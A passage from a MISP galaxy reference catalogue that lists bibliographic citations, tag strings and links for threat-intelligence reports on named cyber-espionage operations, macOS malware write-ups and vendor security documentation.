Moran, N. et al. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="FireEye DeputyDog 9002 November 2013"

Table 14827. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html

Volexity Exchange Marauder March 2021

Grunzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.

The tag is: misp-galaxy:references="Volexity Exchange Marauder March 2021"

Table 14828. Table References

Links

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

ESET Dukes October 2019

Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.

The tag is: misp-galaxy:references="ESET Dukes October 2019"

Table 14829. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

IssueMakersLab Andariel GoldenAxe May 2017

IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="IssueMakersLab Andariel GoldenAxe May 2017"

Table 14830. Table References

Links

http://www.issuemakerslab.com/research3/

ESET Operation Groundbait

Cherepanov, A. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.

The tag is: misp-galaxy:references="ESET Operation Groundbait"

Table 14831. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf

Operation Hangover May 2013

Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Operation Hangover May 2013"

Table 14832. Table References

Links

http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf

ESET Lazarus Jun 2020

Breitenbacher, D. and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="ESET Lazarus Jun 2020"

Table 14833. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf

AhnLab Kimsuky Kabar Cobra Feb 2019

AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="AhnLab Kimsuky Kabar Cobra Feb 2019"

Table 14834. Table References

Links

https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf

Villeneuve et al 2014

Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Villeneuve et al 2014"

Table 14835. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf

Mandiant Operation Ke3chang November 2014

Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Mandiant Operation Ke3chang November 2014"

Table 14836. Table References

Links

https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs

Cisco Operation Layover September 2021

Ventura, V. (2021, September 16). Operation Layover: How we tracked an attack on the aviation industry to five years of compromise. Retrieved September 15, 2023.

The tag is: misp-galaxy:references="Cisco Operation Layover September 2021"

Table 14837. Table References

Links

https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/

Lotus Blossom Jun 2015

Falcone, R., et al. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Lotus Blossom Jun 2015"

Table 14838. Table References

Links

https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html

FireEye Operation Molerats

Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.

The tag is: misp-galaxy:references="FireEye Operation Molerats"

Table 14839. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

McAfee Lazarus Nov 2020

Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="McAfee Lazarus Nov 2020"

Table 14840. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/

McAfee Lazarus Jul 2020

Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="McAfee Lazarus Jul 2020"

Table 14841. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/?hilite=%27Operation%27%2C%27North%27%2C%27Star%27

McAfee Oceansalt Oct 2018

Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.

The tag is: misp-galaxy:references="McAfee Oceansalt Oct 2018"

Table 14842. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

FireEye OpPoisonedHandover February 2016

Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="FireEye OpPoisonedHandover February 2016"

Table 14843. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html

Operation Quantum Entanglement

Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015.

The tag is: misp-galaxy:references="Operation Quantum Entanglement"

Table 14844. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

ProofPoint GoT 9002 Aug 2017

Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="ProofPoint GoT 9002 Aug 2017"

Table 14845. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures

FireEye Op RussianDoll

FireEye Labs. (2015, April 18). Operation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack. Retrieved April 24, 2017.

The tag is: misp-galaxy:references="FireEye Op RussianDoll"

Table 14846. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html

FireEye Operation Saffron Rose 2013

Villeneuve, N. et al. (2013). OPERATION SAFFRON ROSE. Retrieved May 28, 2020.

The tag is: misp-galaxy:references="FireEye Operation Saffron Rose 2013"

Table 14847. Table References

Links

https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf

Cylance Shaheen Nov 2018

Livelli, K., et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.

The tag is: misp-galaxy:references="Cylance Shaheen Nov 2018"

Table 14848. Table References

Links

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517

McAfee Sharpshooter December 2018

Sherstobitoff, R., Malhotra, A., et al. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.

The tag is: misp-galaxy:references="McAfee Sharpshooter December 2018"

Table 14849. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf

Novetta-Axiom

Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Novetta-Axiom"

Table 14850. Table References

Links

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

Cybereason Soft Cell June 2019

Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.

The tag is: misp-galaxy:references="Cybereason Soft Cell June 2019"

Table 14851. Table References

Links

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

Azure AD Graph API

Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.

The tag is: misp-galaxy:references="Azure AD Graph API"

Table 14852. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview

ESET Operation Spalax Jan 2021

Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022.

The tag is: misp-galaxy:references="ESET Operation Spalax Jan 2021"

Table 14853. Table References

Links

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

Proofpoint TA453 July2021

Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="Proofpoint TA453 July2021"

Table 14854. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453

Proofpoint Operation Transparent Tribe March 2016

Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="Proofpoint Operation Transparent Tribe March 2016"

Table 14855. Table References

Links

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

TrendMicro TropicTrooper 2015

Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.

The tag is: misp-galaxy:references="TrendMicro TropicTrooper 2015"

Table 14856. Table References

Links

https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf

ClearSky and Trend Micro Operation Wilted Tulip July 2017

ClearSky and Trend Micro. (2017, July). Operation Wilted Tulip - Exposing a cyber espionage apparatus. Retrieved May 17, 2021.

The tag is: misp-galaxy:references="ClearSky and Trend Micro Operation Wilted Tulip July 2017"

Table 14857. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

ClearSky Wilted Tulip July 2017

ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.

The tag is: misp-galaxy:references="ClearSky Wilted Tulip July 2017"

Table 14858. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

ESET Windigo Mar 2014

Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., Léveillé, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo – the vivisection of a large Linux server‑side credential‑stealing malware campaign. Retrieved February 10, 2021.

The tag is: misp-galaxy:references="ESET Windigo Mar 2014"

Table 14859. Table References

Links

https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/

FoxIT Wocao December 2019

Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.

The tag is: misp-galaxy:references="FoxIT Wocao December 2019"

Table 14860. Table References

Links

https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

TrendMicro Operation Woolen Goldfish March 2015

Cedric Pernet, Kenney Lu. (2015, March 19). Operation Woolen-Goldfish - When Kittens Go Phishing. Retrieved April 21, 2021.

The tag is: misp-galaxy:references="TrendMicro Operation Woolen Goldfish March 2015"

Table 14861. Table References

Links

https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf

Bleeping Computer Op Sharpshooter March 2019

Ilascu. (2019, March 3). Op 'Sharpshooter' Connected to North Korea’s Lazarus Group. Retrieved September 26, 2022.

The tag is: misp-galaxy:references="Bleeping Computer Op Sharpshooter March 2019"

Table 14862. Table References

Links

https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/

Symantec Orangeworm IOCs April 2018

Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018.

The tag is: misp-galaxy:references="Symantec Orangeworm IOCs April 2018"

Table 14863. Table References

Links

https://symantec-enterprise-blogs.security.com/sites/default/files/2018-04/Orangeworm%20IOCs.pdf

Symantec WastedLocker June 2020

Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.

The tag is: misp-galaxy:references="Symantec WastedLocker June 2020"

Table 14864. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

Symantec Calisto July 2018

Pantig, J. (2018, July 30). OSX.Calisto. Retrieved September 7, 2018.

The tag is: misp-galaxy:references="Symantec Calisto July 2018"

Table 14865. Table References

Links

https://web.archive.org/web/20190111082249/https://www.symantec.com/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days

Objective-See MacMa Nov 2021

Wardle, P. (2021, November 11). OSX.CDDS (OSX.MacMa). Retrieved June 30, 2022.

The tag is: misp-galaxy:references="Objective-See MacMa Nov 2021"

Table 14866. Table References

Links

https://objective-see.org/blog/blog_0x69.html

hexed osx.dok analysis 2019

fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="hexed osx.dok analysis 2019"

Table 14867. Table References

Links

http://www.hexed.in/2019/07/osxdok-analysis.html

malwarebyteslabs xcsset dubrobber

Thomas Reed. (2020, April 21). OSX.DubRobber. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="malwarebyteslabs xcsset dubrobber"

Table 14868. Table References

Links

https://blog.malwarebytes.com/detections/osx-dubrobber/

wardle evilquest partii

Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.

The tag is: misp-galaxy:references="wardle evilquest partii"

Table 14869. Table References

Links

https://objective-see.com/blog/blog_0x60.html

wardle evilquest parti

Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.

The tag is: misp-galaxy:references="wardle evilquest parti"

Table 14870. Table References

Links

https://objective-see.com/blog/blog_0x59.html

eset_osx_flashback

ESET. (2012, January 1). OSX/Flashback. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="eset_osx_flashback"

Table 14871. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf

CheckPoint Dok

Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="CheckPoint Dok"

Table 14872. Table References

Links

https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

Intego Shlayer Feb 2018

Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.

The tag is: misp-galaxy:references="Intego Shlayer Feb 2018"

Table 14873. Table References

Links

https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/

SensePost Outlook Forms

Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SensePost Outlook Forms"

Table 14874. Table References

Links

https://sensepost.com/blog/2017/outlook-forms-and-shells/

SensePost Outlook Home Page

Stalmans, E. (2017, October 11). Outlook Home Page – Another Ruler Vector. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SensePost Outlook Home Page"

Table 14875. Table References

Links

https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/

Outlook Today Home Page

Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.

The tag is: misp-galaxy:references="Outlook Today Home Page"

Table 14876. Table References

Links

https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943

Recorded Future Beacon 2019

Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Recorded Future Beacon 2019"

Table 14877. Table References

Links

https://www.recordedfuture.com/identifying-cobalt-strike-servers/

FireEye APT33 Guardrail

Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="FireEye APT33 Guardrail"

Table 14878. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

Kubernetes Cloud Native Security

Kubernetes. (n.d.). Overview of Cloud Native Security. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Kubernetes Cloud Native Security"

Table 14879. Table References

Links

https://kubernetes.io/docs/concepts/security/overview/

Apple Doco Archive Dynamic Libraries

Apple Inc. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Apple Doco Archive Dynamic Libraries"

Table 14880. Table References

Links

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

Apple Dev Dynamic Libraries

Apple. (2012, July 23). Overview of Dynamic Libraries. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Apple Dev Dynamic Libraries"

Table 14881. Table References

Links

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

Kubeflow Pipelines

The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubeflow Pipelines"

Table 14882. Table References

Links

https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/

TechNet RDP Gateway

Microsoft. (n.d.). Overview of Remote Desktop Gateway. Retrieved June 6, 2016.

The tag is: misp-galaxy:references="TechNet RDP Gateway"

Table 14883. Table References

Links

https://technet.microsoft.com/en-us/library/cc731150.aspx

CrowdStrike AQUATIC PANDA December 2021

Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022.

The tag is: misp-galaxy:references="CrowdStrike AQUATIC PANDA December 2021"

Table 14884. Table References

Links

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

OWASP Top 10 2017

OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019.

The tag is: misp-galaxy:references="OWASP Top 10 2017"

Table 14885. Table References

Links

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/

OWASP Top 10

OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="OWASP Top 10"

Table 14886. Table References

Links

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Debian Manual Maintainer Scripts

Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Debian Manual Maintainer Scripts"

Table 14887. Table References

Links

https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact

GCP Packet Mirroring

Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="GCP Packet Mirroring"

Table 14888. Table References

Links

https://cloud.google.com/vpc/docs/packet-mirroring

Citizenlab Packrat 2015

Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Citizenlab Packrat 2015"

Table 14889. Table References

Links

https://citizenlab.ca/2015/12/packrat-report/

GitHub Pacu

Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019.

The tag is: misp-galaxy:references="GitHub Pacu"

Table 14890. Table References

Links

https://github.com/RhinoSecurityLabs/pacu

Pacu Detection Disruption Module

Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Pacu Detection Disruption Module"

Table 14891. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detectiondisruption/main.py

Symantec Palmerworm Sep 2020

Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Symantec Palmerworm Sep 2020"

Table 14892. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt

Apple PAM

Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Apple PAM"

Table 14893. Table References

Links

https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt

Man Pam_Unix

die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Man Pam_Unix"

Table 14894. Table References

Links

https://linux.die.net/man/8/pam_unix

Palo Alto PlugX June 2017

Lancaster, T. and Idrizovic, E. (2017, June 27). Paranoid PlugX. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="Palo Alto PlugX June 2017"

Table 14895. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/

Unit42 PlugX June 2017

Lancaster, T., Idrizovic, E. (2017, June 27). Paranoid PlugX. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Unit42 PlugX June 2017"

Table 14896. Table References

Links

https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/

Secuirtyinbits Ataware3 May 2019

Securityinbits. (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.

The tag is: misp-galaxy:references="Secuirtyinbits Ataware3 May 2019"

Table 14897. Table References

Links

https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3

Dragos PARISITE

Dragos. (n.d.). PARISITE. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="Dragos PARISITE"

Table 14898. Table References

Links

https://www.dragos.com/threat/parisite/

DOJ Lazarus Sony 2018

Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.

The tag is: misp-galaxy:references="DOJ Lazarus Sony 2018"

Table 14899. Table References

Links

https://www.justice.gov/opa/press-release/file/1092091/download

intezer stripped binaries elf files 2018

Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="intezer stripped binaries elf files 2018"

Table 14900. Table References

Links

https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/

Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass

Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass"

Table 14901. Table References

Links

https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191

Office 365 Delegated Administration

Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Office 365 Delegated Administration"

Table 14902. Table References

Links

https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us

Microsoft IFEOorMalware July 2015

Microsoft. (2015, July 30). Part of Windows 10 or really Malware?. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Microsoft IFEOorMalware July 2015"

Table 14903. Table References

Links

https://answers.microsoft.com/windows/forum/windows_10-security/part-of-windows-10-or-really-malware/af715663-a34a-423c-850d-2a46f369a54c

Circl Passive DNS

CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Circl Passive DNS"

Table 14904. Table References

Links

https://www.circl.lu/services/passive-dns/

ObjectiveSee AppleJeus 2019

Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="ObjectiveSee AppleJeus 2019"

Table 14905. Table References

Links

https://objective-see.org/blog/blog_0x49.html

GentilKiwi Pass the Ticket

Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.

The tag is: misp-galaxy:references="GentilKiwi Pass the Ticket"

Table 14906. Table References

Links

http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos

Wikipedia Password cracking

Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Wikipedia Password cracking"

Table 14907. Table References

Links

https://en.wikipedia.org/wiki/Password_cracking

RDP Hijacking Korznikov

Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.

The tag is: misp-galaxy:references="RDP Hijacking Korznikov"

Table 14908. Table References

Links

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

ise Password Manager February 2019

ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="ise Password Manager February 2019"

Table 14909. Table References

Links

https://www.ise.io/casestudies/password-manager-hacking/

Microsoft Password Complexity

Hall, J., Lich, B. (2017, September 9). Password must meet complexity requirements. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="Microsoft Password Complexity"

Table 14910. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements

BlackHillsInfosec Password Spraying

Thyer, J. (2015, October 30). Password Spraying & Other Fun with RPCCLIENT. Retrieved April 25, 2017.

The tag is: misp-galaxy:references="BlackHillsInfosec Password Spraying"

Table 14911. Table References

Links

http://www.blackhillsinfosec.com/?p=4645

how_pwd_rev_enc_1

Teusink, N. (2009, August 25). Passwords stored using reversible encryption: how it works (part 1). Retrieved November 17, 2021.

The tag is: misp-galaxy:references="how_pwd_rev_enc_1"

Table 14912. Table References

Links

http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html

how_pwd_rev_enc_2

Teusink, N. (2009, August 26). Passwords stored using reversible encryption: how it works (part 2). Retrieved November 17, 2021.

The tag is: misp-galaxy:references="how_pwd_rev_enc_2"

Table 14913. Table References

Links

http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html

Volexity Patchwork June 2018

Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="Volexity Patchwork June 2018"

Table 14914. Table References

Links

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

PaloAlto Patchwork Mar 2018

Levene, B. et al. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.

The tag is: misp-galaxy:references="PaloAlto Patchwork Mar 2018"

Table 14915. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/

Symantec Patchwork

Hamada, J. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Symantec Patchwork"

Table 14916. Table References

Links

http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries

Trend Micro Pawn Storm OAuth 2017

Hacquebord, F. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Trend Micro Pawn Storm OAuth 2017"

Table 14917. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

TrendMicro Pawn Storm 2019

Hacquebord, F. (n.d.). Pawn Storm in 2019 A Year of Scanning and Credential Phishing on High-Profile Targets. Retrieved December 29, 2020.

The tag is: misp-galaxy:references="TrendMicro Pawn Storm 2019"

Table 14918. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-pawn-storm-in-2019.pdf

TrendMicro Pawn Storm Dec 2020

Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.

The tag is: misp-galaxy:references="TrendMicro Pawn Storm Dec 2020"

Table 14919. Table References

Links

https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html

ClearSky Pay2Kitten December 2020

ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="ClearSky Pay2Kitten December 2020"

Table 14920. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf

PaypalScam

Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.

The tag is: misp-galaxy:references="PaypalScam"

Table 14921. Table References

Links

https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/

Pcalua.exe - LOLBAS Project

